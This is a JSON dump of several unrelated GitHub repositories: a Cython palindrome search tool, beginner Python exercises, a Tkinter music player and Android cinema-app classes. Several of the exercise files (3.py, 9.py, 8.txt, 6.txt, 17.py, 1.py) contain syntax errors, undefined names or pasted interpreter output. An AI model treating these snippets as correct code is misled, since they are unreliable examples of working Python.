print(\"Bye\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5437921285629272, "alphanum_fraction": 0.5803657174110413, "avg_line_length": 22.08888816833496, "blob_id": "ac380850a9cde4dbb67e7ed5b39a5e486cba3447", "content_id": "d5770c1e8ca6450c54f7f8f5913462dd4068b682", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2078, "license_type": "permissive", "max_line_length": 88, "num_lines": 90, "path": "/test.py", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "from _fast import (\n check,\n reverse_and_add_test,\n is_palindrome_test,\n MAX_ITERS_TEST,\n check_range,\n)\n\ndigits = \"0123456789AB\"\nreverse_digits = {d: i for i, d in enumerate(digits)}\n\n\ndef to_duodecimal(n: int) -> str:\n if n == 0:\n return \"0\"\n\n if n < 0:\n return f\"-{to_duodecimal(-n)}\"\n\n xs = []\n while n:\n xs.append(n % 12)\n n //= 12\n return \"\".join(map(lambda x: digits[x], reversed(xs)))\n\n\ndef from_duodecimal(n: str) -> int:\n if n[0] == \"-\":\n return -from_duodecimal(n[1:])\n\n return sum(map(lambda p: reverse_digits[p[1]] * 12 ** p[0], enumerate(reversed(n))))\n\n\ndef reverse_and_add_simple(n: int) -> int:\n return n + from_duodecimal(\"\".join(reversed(to_duodecimal(n))))\n\n\ndef is_palindrome_simple(n: int) -> bool:\n d = to_duodecimal(n)\n return d == \"\".join(reversed(d))\n\n\ndef check_simple(n: int) -> int:\n for i in range(MAX_ITERS_TEST):\n if is_palindrome_simple(n):\n return i\n n = reverse_and_add_simple(n)\n\n return -1\n\n\ndef test_to_duodecimal():\n assert to_duodecimal(0) == \"0\"\n assert to_duodecimal(1) == \"1\"\n assert to_duodecimal(9) == \"9\"\n assert to_duodecimal(10) == \"A\"\n assert to_duodecimal(11) == \"B\"\n assert to_duodecimal(12) == \"10\"\n assert to_duodecimal(13) == \"11\"\n assert to_duodecimal(23) == \"1B\"\n\n for i in range(1, 42):\n assert to_duodecimal(-i) == \"-\" + to_duodecimal(i)\n\n\ndef test_from_duodecimal():\n for i in range(-1000, 1000):\n assert i == from_duodecimal(to_duodecimal(i))\n\n\ndef test_reverse_and_add():\n for i in range(1, 
1000):\n assert reverse_and_add_test(i) == reverse_and_add_simple(i)\n\n\ndef test_is_palindrome():\n for i in range(1, 100000):\n assert is_palindrome_test(i) == is_palindrome_simple(i)\n\n\ndef test_check():\n for i in range(1, 100):\n assert check(i) == check_simple(i)\n\n\ndef test_check_range():\n for i, n in check_range(1, 100).items():\n for _ in range(i):\n n = reverse_and_add_simple(n)\n assert is_palindrome_simple(n)\n" }, { "alpha_fraction": 0.5053533315658569, "alphanum_fraction": 0.7384903430938721, "avg_line_length": 15.828828811645508, "blob_id": "7aaee5535fba7db9c7366c074e13190e17d6d220", "content_id": "7f3f848e179f39087e8d23c8cd8104fa949f30c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3736, "license_type": "permissive", "max_line_length": 108, "num_lines": 222, "path": "/README.md", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "# Most delayed palindromes generator\n\nThis is an utility that I used to solve little programming quiz back at the university.\n\n## Problem statement\n\nWe were asked to find the most delayed palindrome for any natural number.\n\nMost delayed palindrome of N is the **smallest** decimal natural number which in **exactly** N iterations of\nthe reverse-and-add operation results in the palindrome in the duodecimal system (and at none\nof the previous iterations it is a palindrome).\n\nPalindrome is the number that satisfies `str(n) == ''.join(reversed(str(n)))` (assuming str works\nin duodecimal system).\n\nReverse-and-add operation can be defined as `lambda n: n + int(reversed(str(n)))` (assuming str works\nin duodecimal system).\n\n### Example\n\nLet's see an example of number `23` (decimal) = `1B` (duodecimal).\n\nFirst iteration:\n\n```\n1B + 1B = 110 (duodecimal)\n```\n\nSecond iteration:\n\n```\n110 + 110 = 121 (duodecimal)\n```\n\n`121` (duodecimal) is a palindrome which makes `23` (decimal) second \nmost delayed palindrome. The first one is `12` and the zeroth one is `1`.\n\n## Solution\n\nLet's just iterate over all natural numbers from 1 to infinity, applying to them\nadd-and-reverse operation iteratively, M iterations maximum. At some point we will\nfind all first M most delayed palindromes.\n\nThe key is efficiency. My implementation is written in Cython and is parallelised using multiprocessing.\nIt achieves performance of `14277` numbers per second per thread\non the Intel Core i5 1.4 Ghz (with 200 iterations per number).\n\n## Installation\n\n 1. Clone the repository:\n\n ```shell script\n git clone https://github.com/meownoid/add-and-reverse.git\n ```\n\n 2. Install the dependencies:\n\n ```shell script\n pip install -r requirements.txt\n ```\n\n 3. 
Build the Cython code:\n\n ```shell script\n cythonize -ai _fast.pyx\n ```\n\n## Running\n\nTo check numbers up to `10000` using `8` threads:\n\n```shell script\npython main.py --threads 8 --numbers 10000\n```\n\nOutput looks like this:\n\n```\nStart: 1\nEnd: 80000\nNumber of threads: 8\nFound new numbers: 45\nBye\n```\n\nResults are stored in the `db.sqlite`.\nRunning the application next time will restore last saved state and computation will continue.\n\nTo just print the results and exit use the `--results` argument:\n\n```shell script\npython main.py --results\n```\n\n## Benchmarking\n\nTo benchmark the performance use the `--benchmark` argument:\n\n```shell script\npython main.py --benchmark\n```\n\nBenchmark results will be printed after the computation:\n\n```\nBenchmark results:\n Total time: 8.755 seconds\n Numbers per second: 114223\n Numbers per second per thread: 14277\n```\n\n## Running tests\n\n```shell script\npytest test.py\n```\n\n## Results (up to 100)\n\n| n | result |\n|---|--------|\n0|1\n1|12\n2|23\n3|83\n4|95\n5|236\n6|107\n7|248\n8|267\n9|1139\n10|1847\n11|2445\n12|1547\n13|273\n14|131\n15|21996\n16|1835\n17|274\n18|280\n19|1535\n20|22404\n21|22275\n22|21655\n23|21645\n24|22048\n25|21862\n26|3587\n27|3449\n28|39736\n29|40607\n30|41471\n31|43187\n32|21921\n33|21726\n34|21754\n35|22162\n36|30524\n37|15647\n38|229079\n39|22090\n40|26632\n41|62987\n42|29806\n43|333210\n44|146123\n45|22148\n46|30951\n47|267704\n48|271143\n49|83195\n50|29514\n51|2996385\n52|3003944\n53|3004326\n54|3741686\n55|2997888\n56|3006611\n57|3006407\n58|3087848\n59|3108534\n60|3250214\n61|4745796\n62|4230573\n63|3002068\n64|5482792\n65|3002589\n66|3006222\n67|4230137\n68|3055027\n69|3003385\n70|3000658\n71|3735496\n72|4996357\n73|3058524\n74|53766429\n75|29867135\n76|5478765\n77|3006523\n78|3000199\n79|996191\n80|255738\n81|145931\n82|143855\n83|353940\n84|430124574\n85|430121283\n86|431991805\n87|430114053\n88|430140883\n89|430561503\n90|430115012\n91|430197084\n92|179169803\n93|36038359\n94|23906759\n95|286673255\n96|46158332\n97|27117431\n98|503428020\n99|7453043706\n100|3009901223\n" }, { "alpha_fraction": 0.37931033968925476, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 13.5, "blob_id": "7542e501a4a58c209c54571372be541030ba6310", "content_id": "b671fedc15bab186c30793b4e2244c29c9f8c529", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 29, "license_type": "permissive", "max_line_length": 14, "num_lines": 2, "path": "/requirements.txt", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "numpy>=1.15.0\nCython>=0.29.0\n" } ]
4
yeeun0507/likelion_python
https://github.com/yeeun0507/likelion_python
938e89c1fc73be824ede103e12862f8d13734f74
75a571148990d5892e022810f31ec179c1149f07
da97746f4d16d1c52a4bf82568c79be4a4dcbcf4
refs/heads/master
2022-08-07T22:44:52.295190
2020-05-16T16:24:49
2020-05-16T16:24:49
264,408,163
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3949579894542694, "alphanum_fraction": 0.47058823704719543, "avg_line_length": 14.714285850524902, "blob_id": "c67db1d686698d35fcebf98fc57b59f242af5c32", "content_id": "4f8ddc0296804c7190a81a488f5111e362624136", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 31, "num_lines": 7, "path": "/code/11.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "num = 0\r\nsum = 0\r\nwhile num < 1000:\r\n num += 1\r\n if (num % 3) != 0: continue\r\n sum = sum + num\r\nprint(sum)\r\n\r\n" }, { "alpha_fraction": 0.3207547068595886, "alphanum_fraction": 0.5849056839942932, "avg_line_length": 14.333333015441895, "blob_id": "7145423348ce0f5b0d76c98b3711cd09766d9f5a", "content_id": "633413b270652386a84d9b51092d86cef473540e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 53, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/code/3.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "pin = \"881120-1068234\"\r\nprint(pin[7])\r\nresult =\r\n\r\n\r\n" }, { "alpha_fraction": 0.32679739594459534, "alphanum_fraction": 0.5032680034637451, "avg_line_length": 17.125, "blob_id": "1b53ac962410fd1d9d501b4074e5849186b611fe", "content_id": "679968b6bb20ffaf83962edbeb6c7a5050d88d56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/code/12.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "A = [20, 55, 67, 82, 45, 33, 90, 87, 100, 25]\r\nnum = -1\r\nsum = 0\r\nwhile num < 9:\r\n\tnum += 1\r\n\tif A[num] < 50: continue\r\n\tsum = sum + A[num]\r\nprint(sum)\r\n" }, { "alpha_fraction": 0.4833333194255829, "alphanum_fraction": 0.4833333194255829, "avg_line_length": 18, "blob_id": "dacc7a100e0d8911e745be82875bd0aa7dba4258", "content_id": "f81d2847245e905396e74c7ac104c36f0bed2181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 60, "license_type": "no_license", "max_line_length": 34, "num_lines": 3, "path": "/code/6.txt", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "li= ['Life', 'is', 'too', 'short']\r\n\r\nprint(\"\".join(list))\r\n" }, { "alpha_fraction": 0.44144144654273987, "alphanum_fraction": 0.4954954981803894, "avg_line_length": 10.333333015441895, "blob_id": "f943a1d1fc6cdea7e511e26e3adfc463a4fa1679", "content_id": "fc2ae1cf6d6193e9a1abbb24aeff5b01899269af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 32, "num_lines": 9, "path": "/code/15.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "def average(*arg):\r\n\r\n avg = sum(arg) / len(arg)\r\n\r\n return avg\r\n\r\n\r\n\r\nprint(average(1, 2, 3, 4, 5, 6))\r\n" }, { "alpha_fraction": 0.4126984179019928, "alphanum_fraction": 0.5079365372657776, "avg_line_length": 19, "blob_id": "00abd8c08d860e56ec1d65a85cc2df7730db306b", "content_id": "b6720307d46f4d0b6c70e7641891b43173f1d0d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/code/9.py", "repo_name": 
"yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "dic = {'name':'홍길동', 'birth':'1128', 'age':'30'}\r\n\r\nprint(dic\r\n" }, { "alpha_fraction": 0.520588219165802, "alphanum_fraction": 0.5617647171020508, "avg_line_length": 20.66666603088379, "blob_id": "72e0637bb96818fc086b6581ba1a00b1a2196903", "content_id": "0e3ec3429277062e50b236aaf90b4bcfd5fdea04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 37, "num_lines": 15, "path": "/code/17.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "class MaxLimitCalculator(Calculator):\r\n def add(self, val):\r\n self.value += val\r\n if self.value > 100:\r\n self.value = 100\r\n return self.value\r\n else:\r\n return self.value\r\n\r\ncal = MaxLimitCalculator()\r\n\r\nprint(cal.add(60))\r\nprint(cal.add(30))\r\nprint(cal.add(20))\r\nprint(cal.add(50))\r\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 16.33333396911621, "blob_id": "fb92014f9e3878dc63b19f5b39d06f42bd6cb387", "content_id": "6346c1e3ba192828c18a07594a43e02cab5e51b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/code/8.txt", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "tupel1 = (1,2,3)\r\ntuple2 = (4,)\r\nprint(tuple1=tuple2)\r\n" }, { "alpha_fraction": 0.4390243887901306, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 33.28571319580078, "blob_id": "bca499d396186fcc56edd3ab14a616b844b20319", "content_id": "7840811ca114cd5f0ce6c000985a17a262d8f556", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 94, "num_lines": 7, "path": "/code/1.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "Python 3.8.3 (tags/v3.8.3:6f8c832, May 13 2020, 22:37:02) [MSC v.1924 64 bit (AMD64)] on win32\r\nType \"help\", \"copyright\", \"credits\" or \"license()\" for more information.\r\n>>> i= [80,75,55]\r\n>>> result = sum(i)\r\n>>> print(result/len(i))\r\n70.0\r\n>>> " } ]
9
SudhanshuVijay/music-player-using-python
https://github.com/SudhanshuVijay/music-player-using-python
6b95ba2a42528d4246eb3a6e52ead1e4bd669691
e691747390b519e457a8f13318e7e401ad192866
7386e79e5d70af48407c0ae56cee49722743132c
refs/heads/master
2022-12-25T20:41:05.487435
2020-10-01T07:07:55
2020-10-01T07:07:55
300,167,035
1
2
null
2020-10-01T06:12:31
2020-10-01T06:57:50
2020-10-01T07:07:55
Python
[ { "alpha_fraction": 0.6302149295806885, "alphanum_fraction": 0.6433312296867371, "avg_line_length": 24.476987838745117, "blob_id": "6ee1e597ba6942073568e0c7583fe67f667c575e", "content_id": "3036aa9bed34fff321bc7d1f22977db8d1a35b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6328, "license_type": "no_license", "max_line_length": 115, "num_lines": 239, "path": "/melody.py", "repo_name": "SudhanshuVijay/music-player-using-python", "src_encoding": "UTF-8", "text": "import os\r\nfrom tkinter import *\r\n#HELLO BOYYS\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\n\r\nimport tkinter.messagebox\r\nfrom tkinter import filedialog\r\nfrom pygame import mixer\r\nfrom mutagen.mp3 import MP3\r\nimport time\r\nimport threading\r\n\r\nroot = tk.ThemedTk()\r\n\r\nroot.get_themes()\r\nroot.set_theme(\"radiance\")\r\n\r\nmixer.init() # initializing the mixer\r\nroot.title(\"Melody\")\r\nroot.iconbitmap(r'images/melody.ico')\r\n\r\nstatusbar = Label(root, text=\"Wlcome To Melody\", relief=SUNKEN, anchor=W, font=\"Times 15 italic\")\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\nfilelabel = ttk.Label(root, text='Welcome')\r\nfilelabel.pack()\r\n\r\nlengthlabel = ttk.Label(root, text='Total Length - --:--')\r\nlengthlabel.pack(pady=5)\r\n\r\ncurrenttimelabel = ttk.Label(root, text='Current Time - --:--', relief=GROOVE)\r\ncurrenttimelabel.pack()\r\n\r\n\r\nmenubar = Menu(root)\r\nroot.config(menu=menubar)\r\n\r\nsubMenu = Menu(menubar, tearoff=0)\r\n\r\nplaylist = []\r\n\r\n\r\ndef brows_file():\r\n global filename_path\r\n filename_path = filedialog.askopenfilename()\r\n add_to_playlist(filename_path)\r\n\r\n\r\ndef add_to_playlist(filename):\r\n filename = os.path.basename(filename)\r\n index = 0\r\n playlistbox.insert(index, filename)\r\n playlist.insert(index, filename_path)\r\n index += 1\r\n\r\n\r\nmenubar.add_cascade(label=\"File\", menu=subMenu)\r\nsubMenu.add_command(label='Open', command=brows_file)\r\nsubMenu.add_command(label='Exit', command=root.destroy)\r\n\r\n\r\ndef About_us():\r\n tkinter.messagebox.showinfo('About Melody', 'This is a music player, build using python tkinter by Sudhanshu Vijay')\r\n\r\n\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"Help\", menu=subMenu)\r\nsubMenu.add_command(label='About Us', command=About_us)\r\n\r\nright_frame = Frame(root)\r\nright_frame.pack(side=RIGHT, pady=30)\r\n\r\nleft_frame = Frame(root)\r\nleft_frame.pack(side=LEFT, padx=30, pady=30)\r\n\r\ntop_frame = Frame(right_frame)\r\ntop_frame.pack()\r\n\r\nplaylistbox = Listbox(left_frame)\r\nplaylistbox.pack()\r\n\r\nadd_btn = ttk.Button(left_frame, text=\"+ Add\", command=brows_file)\r\nadd_btn.pack(side=LEFT)\r\n\r\n\r\ndef del_song():\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n playlistbox.delete(selected_song)\r\n playlist.pop(selected_song)\r\n\r\n\r\ndel_btn = ttk.Button(left_frame, text=\"- Del\", command=del_song)\r\ndel_btn.pack(side=LEFT)\r\n\r\n\r\ndef show_details(play_song):\r\n filelabel['text'] = \"Playing\" + ' - ' + os.path.basename(play_song)\r\n file_data = os.path.splitext(play_song)\r\n if file_data[1] == '.mp3':\r\n audio = MP3(play_song)\r\n total_length = audio.info.length\r\n else:\r\n a = mixer.Sound(play_song)\r\n total_length = a.get_length()\r\n\r\n mins, secs = divmod(total_length, 60)\r\n mins = round(mins)\r\n secs = round(secs)\r\n timeformat = '{:02d}:{:02d}'.format(mins, secs)\r\n lengthlabel['text'] = \"Total 
Length\" + ' - ' + timeformat\r\n\r\n t1 = threading.Thread(target=start_count, args=(total_length,))\r\n t1.start()\r\n\r\n\r\ndef start_count(t):\r\n global paused\r\n current_time = 0\r\n while current_time <= t and mixer.music.get_busy():\r\n if paused:\r\n continue\r\n else:\r\n mins, secs = divmod(current_time, 60)\r\n mins = round(mins)\r\n secs = round(secs)\r\n timeformat = '{:02d}:{:02d}'.format(mins, secs)\r\n currenttimelabel['text'] = \"Current Length\" + ' - ' + timeformat\r\n time.sleep(1)\r\n current_time += 1\r\n\r\n\r\ndef play_music():\r\n global paused\r\n\r\n if paused:\r\n mixer.music.unpause()\r\n statusbar['text'] = \"Music Resumed...\"\r\n paused = FALSE\r\n else:\r\n try:\r\n stop_music()\r\n time.sleep(1)\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n play_it = playlist[selected_song]\r\n mixer.music.load(play_it)\r\n mixer.music.play()\r\n statusbar['text'] = \"Playing Music...\" + ' ' + os.path.basename(play_it)\r\n show_details(play_it)\r\n except:\r\n tkinter.messagebox.showerror('File Not Found', 'Melody Could Not Find The File. Please Check It Again')\r\n\r\n\r\ndef stop_music():\r\n mixer.music.stop()\r\n statusbar['text'] = \"Music Stopped...\"\r\n\r\n\r\npaused = FALSE\r\n\r\n\r\ndef pause_music():\r\n global paused\r\n paused = TRUE\r\n mixer.music.pause()\r\n statusbar['text'] = \"Music Paused...\"\r\n\r\n\r\ndef rewind_music():\r\n play_music()\r\n statusbar['text'] = \"Music Rewinded...\"\r\n\r\n\r\ndef set_vol(val):\r\n volume = float(val) / 100\r\n mixer.music.set_volume(volume)\r\n\r\n\r\nmuted = FALSE\r\n\r\n\r\ndef mute_music():\r\n global muted\r\n if muted:\r\n mixer.music.set_volume(0.5)\r\n volumeButton.configure(image=volume_photo)\r\n scale.set(50)\r\n muted = FALSE\r\n else:\r\n mixer.music.set_volume(0)\r\n volumeButton.configure(image=mute_photo)\r\n scale.set(0)\r\n muted = TRUE\r\n\r\n\r\nmiddleframe = Frame(right_frame)\r\nmiddleframe.pack(pady=30, padx=30)\r\n\r\nplay_photo = PhotoImage(file='images/play.png')\r\nplayButton = ttk.Button(middleframe, image=play_photo, command=play_music)\r\nplayButton.grid(row=0, column=0, padx=10)\r\n\r\nstop_photo = PhotoImage(file='images/stop.png')\r\nstopButton = ttk.Button(middleframe, image=stop_photo, command=stop_music)\r\nstopButton.grid(row=0, column=1, padx=10)\r\n\r\npause_photo = PhotoImage(file='images/pause.png')\r\npauseButton = ttk.Button(middleframe, image=pause_photo, command=pause_music)\r\npauseButton.grid(row=0, column=2, padx=10)\r\n\r\nbottomframe = Frame(right_frame)\r\nbottomframe.pack(pady=10)\r\n\r\nrewind_photo = PhotoImage(file='images/rewind.png')\r\nrewindButton = ttk.Button(bottomframe, image=rewind_photo, command=rewind_music)\r\nrewindButton.grid(row=0, column=0)\r\n\r\nmute_photo = PhotoImage(file='images/mute.png')\r\nvolume_photo = PhotoImage(file='images/volume.png')\r\nvolumeButton = ttk.Button(bottomframe, image=volume_photo, command=mute_music)\r\nvolumeButton.grid(row=0, column=1)\r\n\r\nscale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)\r\nscale.set(50)\r\nmixer.music.set_volume(0.5)\r\nscale.grid(row=0, column=2, pady=15, padx=30)\r\n\r\n\r\ndef on_closing():\r\n stop_music()\r\n root.destroy()\r\n\r\n\r\nroot.protocol(\"WM_DELETE_WINDOW\", on_closing)\r\n\r\nroot.mainloop()\r\n#nice job\r\n" } ]
1
dsitum/mKino
https://github.com/dsitum/mKino
656a8ae731f135812652b8387acf491e64de6498
c3949ccec32acb8de02c304650e172e31856b4a3
aa931c8defd510b09bfc6b2bb66d1f6d5bd59b0e
refs/heads/master
2021-01-10T20:14:04.890411
2015-02-08T23:54:11
2015-02-08T23:54:11
30,510,699
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6917840242385864, "alphanum_fraction": 0.6927229762077332, "avg_line_length": 31.543306350708008, "blob_id": "3382a9dd957f4735757d9e78353d4a9fe9a215ff", "content_id": "1c67a72d0b0192003e4fe8dc43408b396b1f8249", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4277, "license_type": "no_license", "max_line_length": 105, "num_lines": 127, "path": "/client-side/src/hr/air/mkino/server/JsonPrijava.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.NameValuePair;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.entity.UrlEncodedFormEntity;\r\nimport org.apache.http.client.methods.HttpPost;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.apache.http.message.BasicNameValuePair;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport hr.air.mkino.tipovi.Korisnik;\r\nimport android.os.AsyncTask;\r\n/**\r\n * klasa koja služi za prijavu korisnika u sustav uz pomoć asinkrone komunikacije \r\n * između aplikacije i servisa koji provjerava da li postoji korisnik u bazi \r\n * podataka sa navedenim korisničkim imenom i lozinkom\r\n * \r\n * */\r\npublic class JsonPrijava extends AsyncTask<String, Korisnik, String> {\r\n\r\n\t\t/**\r\n\t\t * Metoda koja izvršava provjeru korisnika uz pomoć servisa\r\n\t\t * @param korisnicko ime i odgovarajuća lozinka\r\n\t\t * @return popunjeni objekt tipa Korisnik(korisnickoIme, \"\", ime, prezime, email, telefon) \r\n\t\t * ukoliko je prijava uspjesna ili null ukoliko prijava nije uspješna\r\n\t\t */\r\n\t\tpublic Korisnik prijavi(String korisnickoIme, String lozinka)\r\n\t\t{\t\t\t\r\n\t\t\tthis.execute(korisnickoIme,lozinka );\r\n\t\t\tString jsonRezultat = \"\";\r\n\t\t\ttry {\r\n\t\t\t\tjsonRezultat = this.get();\r\n\t\t\t} catch (InterruptedException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} catch (ExecutionException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn parsirajJson(jsonRezultat);\t\t\t\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Parsira json string dohvaćen s web servisa\r\n\t\t * @param jsonRezultat\r\n\t\t * @return popunjeni objekt tipa Korisnik(korisnickoIme, \"\", ime, prezime, email, telefon) \r\n\t\t * ukoliko je prijava uspjesna ili null ukoliko prijava nije uspjesna\r\n\t\t */\r\n\t\tprivate Korisnik parsirajJson(String jsonRezultat) {\t\t\r\n\t\t\tKorisnik korisnik = null;\r\n\t\t\t\r\n\t\t\ttry {\r\n\t\t\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\t\t\tint n = rezultati.length();\r\n\t\t\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tString korisnickoIme = rezultat.getString(\"korisnickoIme\");\r\n\t\t\t\t\t\t/*lozinka se ne dohvaća putem web servisa*/\r\n\t\t\t\t\t\tString lozinka = \"\";\r\n\t\t\t\t\t\tString ime = rezultat.getString(\"ime\");\r\n\t\t\t\t\t\tString prezime = rezultat.getString(\"prezime\");\r\n\t\t\t\t\t\tString email = rezultat.getString(\"email\");\r\n\t\t\t\t\t\tString telefon = 
rezultat.getString(\"telefon\");\r\n\t\t\t\t\t\t/*unošenje primljenih korisničkih podataka u objekt*/\r\n\t\t\t\t\t\tkorisnik = new Korisnik(korisnickoIme, lozinka, ime, prezime, email, telefon);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t}\r\n\t\t\t}\t\t\t\r\n\t\t\tcatch (JSONException e) {\t\r\n\t\t\t/*\r\n\t\t\t * izvršava se ukoliko prijava nije uspješna, odnosno ne postoji\r\n\t\t\t * korisnik sa traženim korisničkim imenom i lozinkom\r\n\t\t\t * */\r\n\t\t\t\te.printStackTrace();\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn korisnik;\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Metoda za asinkronu komunikaciju između aplikacije i servisa.\r\n\t\t * @param korisnicko ime i lozinka u obliku ArrayList\r\n\t\t * @return odgovor servisa u json obliku\r\n\t\t * */\r\n\t\tprotected String doInBackground(String... podaciPrijava) {\r\n\t\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\t \r\n\t\t\tHttpPost httpPostZahtjev = new HttpPost(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=prijava\");\r\n\t\t\tString jsonResult = \"\";\r\n\t\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\t\r\n\t\t\t\r\n\t\t\ttry {\r\n\t\t\t\tList<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(2);\r\n\t\t\t nameValuePairs.add(new BasicNameValuePair(\"korisnickoIme\", podaciPrijava[0]));\r\n\t\t\t nameValuePairs.add(new BasicNameValuePair(\"lozinka\", podaciPrijava[1]));\r\n\t\t\t \r\n\t\t\t httpPostZahtjev.setEntity(new UrlEncodedFormEntity(nameValuePairs));\t\t\t \r\n\t\t\t\tjsonResult = httpKlijent.execute(httpPostZahtjev, handler);\r\n\t\t\t}\r\n\t\t\tcatch(ClientProtocolException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\tcatch(IOException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\t\treturn jsonResult;\r\n\t\t}\r\n\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7505054473876953, "alphanum_fraction": 0.7509098052978516, "avg_line_length": 36.640625, "blob_id": "f864e450a6053149816001ae2ad2f2c43049eedf", "content_id": "0f33a36312dd114d680d4258c9b4b664f0a80c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2479, "license_type": "no_license", "max_line_length": 135, "num_lines": 64, "path": "/client-side/src/hr/air/mkino/DetaljiFilmaActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\nimport hr.air.mkino.baza.FilmoviAdapter;\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\nimport hr.air.mkino.tipovi.FilmInfo;\r\nimport hr.air.mkino.uzorcidizajna.UcitajSlikuFactory;\r\nimport android.app.Activity;\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\nimport android.widget.ImageView;\r\nimport android.widget.TextView;\r\n\r\n/**\r\n * Ova klasa predstavlja detalje pojedinog filma.\r\n * @author domagoj\r\n *\r\n */\r\npublic class DetaljiFilmaActivity extends Activity {\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_detalji_filma);\r\n\t\tsetTitle(\"Detalji filma\");\r\n\t\t\r\n\t\tFilmInfo detaljiFilma = dohvatiPodatkeZaFilm();\r\n\t\tprikaziPodatkeZaFilm(detaljiFilma);\r\n\t}\r\n\r\n\t/**\r\n\t * Dohvaća podatke filma koji uključuju naziv, glavne uloge, autora itd.\r\n\t * ID filma prima pomoću podataka iz intenta, koji su poslani klikom na film sa liste svih aktualnih filmova (klasa 